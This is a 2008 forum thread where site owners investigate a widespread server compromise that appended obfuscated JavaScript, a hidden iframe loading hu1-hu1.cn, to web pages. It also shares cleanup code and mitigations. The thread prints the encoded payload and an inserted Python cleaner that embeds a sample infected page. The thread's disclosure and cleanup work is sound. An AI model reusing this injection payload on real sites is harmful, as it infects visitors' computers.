Hey admins - URGENT.

Discussion in 'General chat' started by dgriffith, Oct 23, 2008.

  1. dgriffith

    dgriffith Junior Member

    Joined:
    Nov 30, 2006
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    0
    I debated whether to just PM the site admins, or post this message here. I decided here, as I don't know when an admin will next be online, as only 9anda1f seems to have been here in the last 24 hours, and I think it's a little important for visitors to be aware of it. Long story short for anyone else reading - if your PC has opened up Acrobat Reader on loading the index page here, better scan your computer for bugs. Probably nothing serious, but one never knows.


    Ok.
    Seem to have come across a little webbug - Who can edit the index.php page?

    I keep getting popups when I arrive at the front page that attempt to load a pdf. So, I opened the page source up and found this immediately suspicious bit at the end:

    Code:
     var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = ""; 
    for(var i=0;i
     
  2. Mrs Parker-Bowles

    Mrs Parker-Bowles Junior Member

    Joined:
    Nov 10, 2006
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Hey,

    I had the same thing happen to me today. Good on you Dave for exploring.
    I have been bumped into threads twice today - hand wasn't even on the mouse. A bit strange but, is it related??
    I also received an email telling me I had a response to a thread I posted on earlier today but when I got there, there was nothing. In fact when I logged on it took me into the "permaculture for the classroom ideas" thread, not the one I'd posted in.
    I don't know if this is relevant Dave - you mentioned that it appears to be windows only. I'm running Mac OSX.

    We certainly are being bombarded with crap here lately.

    Anyway, hope this helps.
     
  3. 9anda1f

    9anda1f Administrator Staff Member

    Joined:
    Jul 10, 2006
    Messages:
    3,046
    Likes Received:
    199
    Trophy Points:
    63
    Gender:
    Male
    Location:
    E Washington, USA
    Climate:
    Semi-Arid Shrub Steppe (BsK)
    Re: Hey admins - URGENT.

    Thanks dg, it's happening to me also. I'll pm Murray.
     
  4. jmbullis

    jmbullis Guest

    Re: Hey admins - URGENT.

    Hi Guys,

    Our server got hit by this same issue this morning around 8 o'clock CST. I did a search for the domain that was coming up on Google and came across this post. One thing I noticed is that our server and the Permaculture server are both being hosted by Layered Technologies. Is this just a coincidence? I am wondering if there are other Layered Tech clients out there with the same issue today.

    James Bulils
    Xeal.com
     
  5. sunnyslopes

    sunnyslopes Junior Member

    Joined:
    May 1, 2008
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Hello :) Same problem here. Norton is blocking the attacks for now. Damn those anarchists.
     
  6. nickggr

    nickggr Guest

    Re: Hey admins - URGENT.

    Even this forum here is infected. :(
    I have a dedicated server hosting about 40 sites and all of them were infected too. I managed to create a PHP script that cleaned all the infected files and everything is back to normal again, but now I'm trying to figure out how this worm attacked, to prevent it from doing it again...
     
  7. ronhere

    ronhere New Member

    Joined:
    Oct 23, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Are your sites hosted on layeredtech..??

    I just googled the script code and found this forum. Unfortunately, even our server has been attacked with the same script and it is affecting all the sites on our server.

    Can nickggr also share the PHP script to overcome this problem? We have about 80 sites and it is not possible to edit the files manually, and I am no coder.

    Thanks and looking for your response.

    Ron
     
  8. marion

    marion New Member

    Joined:
    Oct 23, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    We're also being affected, and yes we're with Layered as well. One of the issues we're having is that our files are being changed to the root user and we can't change them.
     
  9. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Good detective work Dave ! FWIW... I ran into this once already, and I'm on OSX 10.5.5. If it's a JS issue, everyone will get it (possibly browser dependent), but it may not affect the target OS if it's not Windows. Also, FWIW, phpBB is widely used, so is one of the most popular systems out there in terms of targeting exploits.

    Hahaha... SEE ! I just clicked the "preview" button, and I got sent to the Hui1-Hui1 script !
     
  10. Khuffie

    Khuffie New Member

    Joined:
    Oct 23, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Would you be able to email me that PHP script you wrote? I am having that same issue. It's my username @ gmail.com. Thanks!

    For the record, I am on BurstNET. ALL .php and .html files across my whole server have been affected it seems, and that code was splattered on the bottom. Not sure what the exploit is.
     
  11. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    On a side note, my vote is having the Permaculture assets "not" be on an OSS architecture... I believe it should be on a custom system.
    The primary reasons are things like this, and also the importance of the data being secure. Some see permaculturists as activists, and it wouldn't take much for a governmental agency to compromise the entire system. Not trying to play the paranoia role, but, it's true.

    As the Permaculture Master Plan fleshes out, I'll throw my vote in for it being an "extremely secure and proprietary" system. I'm all for OSS, but you don't run a bank (or seed bank!) completely on OSS :)
     
  12. marion

    marion New Member

    Joined:
    Oct 23, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    We've been told it's a PHP exploit and not related to software such as phpBB, WordPress and etc.
     
  13. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    It's a browser exploit, and can be pushed to the client in any language.

    The fact that the Javascript is being served in the first place sounds like it must be a PHP exploit (which I would love to have the link to, as such exploits are usually fixed and published promptly (in that order)). It would be much more realistic if the Javascript entered into the system through the software itself.
     
  14. nickggr

    nickggr Guest

    Re: Hey admins - URGENT.

    Hello everyone, after your requests I have uploaded here the PHP script I created for cleaning the infected files.

    https://www.savefile.com/files/1855155

    It is 100% safe but if you don't trust it you can ask anyone with knowledge of PHP to review its code.

    Warning: you must have root access to your server and you must run this script from the shell as a root user
    (it will not work correctly if you open it in your browser)

    Usage: upload the file clean.php in the directory you want to clean and simply run the following command on your shell:

    php clean.php

    It will clean all PHP, HTML, HTM and TPL files not only in the current directory, but in the whole subdirectory tree where you have uploaded this file. If there are thousands of files and subdirectories under the current directory, the script may appear frozen for the first seconds or minutes after you give the above command, so don't worry, it is normal. After this it will begin informing you about the cleaning process of each file.

    For instance, if you upload this script in your public_html directory it will clean all the files on your site.

    Alternatively you can give the command:

    php clean.php /path/to/directory

    to clean a directory different than this where you have uploaded clean.php

    Although I have tested it on my server, cleaned more than 10000 files in 2 minutes and have got no problems, I suggest you backup your current files just in case...

    Good luck!

    Maybe the same can be done with a Perl or shell script, but I am not so good with these, so I used PHP. :)
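Both the obfuscated string Dave quoted in the first post and the cleaner Nick describes here lend themselves to a worked example; the Python below is added to this thread and is not Nick's clean.php (that is only at the link above) nor anyone else's code from the forum. It decodes the +1 character shift to show what the string loads, and walks a directory tree stripping the injected <script> element from .php/.html/.htm/.tpl files wherever it sits in the page; the infected page it runs on is a constructed sample with the decoder loop left out, and the marker, regex and function names are my own choices.

```python
import os
import re
import tempfile
# "=jgsbnf!tsd>" opens the string quoted in post 1: "<iframe src=" shifted by +1.
MARKER = b'=jgsbnf!tsd>'
# One <script> element holding that string, wherever it sits in the page.
INJECTED = re.compile(rb'<script[^>]*>(?:(?!</script>).)*?var\s+source\s*=\s*"'
                      + re.escape(MARKER) + rb'[^"]*".*?</script>\s*', re.S | re.I)

# Constructed sample of an infected page; the decoder loop is deliberately elided.
SAMPLE_INFECTED = (
    b'<html><body>\n<script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0'
    b'joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";\n'
    b'/* decoder loop elided in this constructed sample */</script>\n'
    b'<p>Site content</p>\n<script src="/js/forum.js"></script>\n</body></html>\n')

def decode_shifted(s):
    # Undo the +1 shift to see what the injected string actually loads.
    return ''.join(chr(ord(c) - 1) for c in s)

def clean_text(data):
    # Returns (cleaned_bytes, number_of_injected_blocks_removed).
    return INJECTED.subn(b'', data)

def clean_tree(root):
    # Strip the block from every .php/.html/.htm/.tpl file under root; returns
    # {path: blocks_removed} for the files that were actually rewritten.
    changed = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(('.php', '.html', '.htm', '.tpl')):
                continue
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as f:
                cleaned, n = clean_text(f.read())
            if n:  # rewrite only infected files; a root-owned, read-only one raises PermissionError here
                with open(path, 'wb') as f:
                    f.write(cleaned)
                changed[path] = n
    return changed

def demo():
    # Clean a temp tree holding the constructed sample; returns (changed, page).
    root = tempfile.mkdtemp()
    path = os.path.join(root, 'index.php')
    with open(path, 'wb') as f:
        f.write(SAMPLE_INFECTED)
    changed = clean_tree(root)
    with open(path, 'rb') as f:
        return changed, f.read()
```

As the earlier posts about files being chown'ed to root suggest, this only strips the payload; it says nothing about how it got written in the first place.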
     
  15. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    You rock Nick ! Quick question, could the exploit in question be anywhere on the page, not just immediately after the body tag ? Maybe just a global replace of the script tag itself (minus any outlining html elements) ?

    Also... how did this happen in the first place ?
     
  16. nickggr

    nickggr Guest

    Re: Hey admins - URGENT.

    The exploit code is inserted right after the tag in every page. But my clean script removes it no matter where the code could be in the page.

    I have no idea either how the exploit infected our sites... I have not found anything suspicious yet in my Apache logs. I have noticed that all infected files have changed their owner to root, so maybe a Linux kernel issue or somebody breaking the root password?
     
  17. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Nick, yeah, good question. I'd highly doubt it was a kernel issue, or an OS layer issue... and I'd bet on it being at the application level. Someone targeting a range of IP's, gaining root access and chown'ing web application directories (which may be located anywhere) seems a bit far fetched.

    Are you running phpBB, phpCMS, Plone, Drupal, or is your system custom ? I'm willing to bet that it was a simple URI or multipart hack against one of these systems. It could indeed be a PHP specific issue... but, that is a bit more far fetched as well.

    The plot thickens ! As a nerd, I'm interested in helping to get to the bottom of it if possible :D
     
  18. fr34k123

    fr34k123 Guest

    Re: Hey admins - URGENT.

    Hi,
    I have been following this topic - due to earlier errors on my site.

    I contacted my hosts who indeed have confirmed my VPS container was hacked. We are running php 5.2 and use raven nuke fully up to date and nuke sentinel (again fully up to date).

    I have logged in to my FTP and can see that almost every folder/file has an edited date of today - so this is definitely gonna take some time to sort out.

    I'm afraid most hosts won't sort out the problem and all files need to be manually edited by hand to remove this code - and as of yet no way of knowing if it will keep returning - as we all know hackers don't stop!!!

    I have downloaded your clean.php script (forgive my noobness to all this) - and I usually have a guy deal with all the in-depth technical stuff with my site - but currently he's away and so it means I will have to sort out this problem on my own :(.

    I currently have cPanel access and WHM access - in a brief outline - can you advise me of how I would run this script through shell access?

    Thanks
     
  19. dgriffith

    dgriffith Junior Member

    Joined:
    Nov 30, 2006
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Well! Seems to be a widespread problem across a number of sites. Have to wonder what the point of entry is. Hopefully everyone can get things sorted out on their respective sites soon enough.

    A quick temporary fix for users is to either disable javascript (not real good) or block hu1-hu1.cn from loading with your favorite ad-blocker, or set hu1-hu1.cn to 127.0.0.1 in your HOSTS file.

    This is as good a reason as any to promote Firefox, so I'll describe how to do it with Firefox and Ad-Block Plus :)

    1. Get Firefox Here
    2. Get Ad-Block Plus extension here
    3. Open the forum page, press "escape" when it all displays to stop it loading the hu1-hu1 page.
    4. Click on the little ABP stop-sign icon at the top right of the screen.
    5. Scroll down the list of items until you see the hu1-hu1.cn item, highlight and press enter.
    6. A list of the currently-blocked items will appear, and hu1-hu1.cn should be on it. Press OK.
    7. You've now filtered the bug and you're right to go.

    Cheers and good luck to everyone cleaning this mess up :)

    Dave
     
  20. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    +1 for Firefox !

    Realized someone mentioned FTP'ing into their site... that is the first security hole !!!
    Many PHP users seem to update sites this way, which is definitely not a good idea. You should always connect to your machines through an ssh tunnel !! Using straight FTP, you may as well post your IP and login credentials to this forum right now :D

    On the topic at hand, simply removing the JS from the infected files is probably not enough. The files were chown'ed, which requires root access (or a sudoer, but this is probably a root attack). Personally, I would consider the machines compromised, and start over. Diff your current code repository against your last safe revision (you are using revision control, right ?), then back up that version, and reinstall the OS / VM.

    Unless you are a system administrator who has done careful auditing of your machine, it would be almost impossible to tell what has changed on the machines (ie: backdoors installed) if the intruder was smart. This looks like a pretty widespread attack from the looks of it, and I err on being safe rather than sorry... unless you want something similar or worse cropping up soon.

    What a pain... I bet if the attacker knew what permaculture was, they would have added this site to their whitelist :)
     
